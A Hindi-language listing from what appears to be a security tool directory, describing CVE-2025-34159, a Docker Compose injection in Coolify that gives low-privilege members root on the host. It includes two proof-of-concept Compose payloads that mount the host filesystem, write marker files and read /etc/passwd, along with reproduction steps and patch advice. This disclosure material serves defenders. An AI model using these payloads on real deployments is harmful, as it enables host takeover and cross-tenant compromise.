Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-34159 — Coolify के एप्लिकेशन परिनियोजन वर्कफ़्लो में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है। यह दोष एक कम-विशेषाधिकार प्राप्त सदस्य को प्रोजेक्ट निर्माण या अपडेट के दौरान मनमाने ढंग से Docker Compose निर्देश इंजेक्ट करने की अनुमति देता है। एक दुर्भावनापूर्ण सेवा को परिभाषित करके जो होस्ट फ़ाइल सिस्टम को माउंट करती है, एक हमलावर रूट-स्तरीय कमांड निष्पादन प्राप्त कर सकता है | Kitploit
उपकरण/GitHubGitHub/eyodav/cve-2025-34159
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षागलत कॉन्फ़िगरेशनरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Coolify के एप्लिकेशन परिनियोजन वर्कफ़्लो में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है। यह दोष एक कम-विशेषाधिकार प्राप्त सदस्य को प्रोजेक्ट निर्माण या अपडेट के दौरान मनमाने ढंग से Docker Compose निर्देश इंजेक्ट करने की अनुमति देता है। एक दुर्भावनापूर्ण सेवा को परिभाषित करके जो होस्ट फ़ाइल सिस्टम को माउंट करती है, एक हमलावर रूट-स्तरीय कमांड निष्पादन प्राप्त कर सकता है

GitHub
eyodav/cve-2025-34159

CVE-2025-34159

रिपॉजिटरी देखें
151 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-34159: Coolify में Docker Compose इंजेक्शन

भेद्यता अवलोकन

फ़ील्डमान
CVE आईडीCVE-2025-34159
प्रभावित करता हैCoolify ≤ v4.0.0-beta.420.6
में ठीक किया गयाv4.0.0-beta.420.7
गंभीरतागंभीर
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (OS कमांड इंजेक्शन), CWE-20 (अनुचित इनपुट सत्यापन)

कार्यकारी सारांश

Coolify के एप्लिकेशन डिप्लॉयमेंट वर्कफ़्लो में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता मौजूद है। यह दोष एक कम-विशेषाधिकार वाले सदस्य को प्रोजेक्ट निर्माण या अपडेट के दौरान मनमाने Docker Compose निर्देश इंजेक्ट करने की अनुमति देता है। एक दुर्भावनापूर्ण सेवा को परिभाषित करके जो होस्ट फ़ाइलसिस्टम को माउंट करती है, एक हमलावर कंटेनर आइसोलेशन को पूरी तरह से बायपास करते हुए होस्ट OS पर रूट-स्तरीय कमांड निष्पादन प्राप्त कर सकता है।


सुरक्षा प्रभाव

  • रूट विशेषाधिकारों के साथ होस्ट सिस्टम पर मनमाना कमांड निष्पादन
  • पूर्ण होस्ट से समझौता, जिसमें सिस्टम फ़ाइलों को पढ़ने/लिखने, स्थिरता स्थापित करने और पार्श्व गति करने की क्षमता शामिल है
  • मल्टी-टेनेंट सुरक्षा उल्लंघन संभावित रूप से उसी इंस्टेंस पर अन्य उपयोगकर्ताओं और टीमों से समझौता करता है
  • सुरक्षा नियंत्रणों को बायपास करना UI टर्मिनल एक्सेस प्रतिबंधों (403 नियंत्रण) को अप्रासंगिक बनाता है

तकनीकी विवरण

प्रभावित संस्करण

  • कमजोर संस्करण: Coolify ≤ v4.0.0-beta.420.6
  • पैच किया गया संस्करण: v4.0.0-beta.420.7

हमला वेक्टर

यह भेद्यता प्रोजेक्ट डिप्लॉयमेंट वर्कफ़्लो में मौजूद है जहां उपयोगकर्ता द्वारा प्रदान की गई Docker Compose कॉन्फ़िगरेशन को पर्याप्त सत्यापन या सैंडबॉक्सिंग के बिना संसाधित किया जाता है।


प्रूफ़ ऑफ़ कॉन्सेप्ट

PoC 1: होस्ट रूट माउंट कमांड निष्पादन के साथ

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

परिणाम: डिप्लॉयमेंट के बाद, /tmp/proof_rce.txt होस्ट सिस्टम पर दिखाई देता है, जो रूट विशेषाधिकारों के साथ RCE की पुष्टि करता है।

PoC 2: लक्षित होस्ट पथ लेखन

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

पुनरुत्पादन चरण

  1. प्रमाणित करें सदस्य-स्तरीय उपयोगकर्ता (गैर-प्रशासक) के रूप में
  2. Coolify में कोई प्रोजेक्ट बनाएं या संपादित करें
  3. ऊपर दिए गए Docker Compose पेलोड में से किसी एक का उपयोग करके दुर्भावनापूर्ण कॉन्फ़िगरेशन प्रदान करें
  4. प्रोजेक्ट डिप्लॉय करें
  5. होस्ट-साइड आर्टिफैक्ट्स (जैसे, /tmp/proof_rce.txt) की जाँच करके या डिप्लॉयमेंट लॉग में कमांड आउटपुट की समीक्षा करके शोषण सत्यापित करें

तत्काल कार्रवाइयाँ

  1. तुरंत अपग्रेड करें Coolify v4.0.0-beta.420.7 या बाद के संस्करण पर
  2. संभावित रूप से दुर्भावनापूर्ण Docker Compose कॉन्फ़िगरेशन के लिए मौजूदा प्रोजेक्ट्स की समीक्षा करें

संदर्भ

  • पैच/रिलीज़ नोट्स: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • सलाहकार/PoC रिपॉजिटरी: https://github.com/Eyodav/CVE-2025-34159
टूल डाउनलोड करें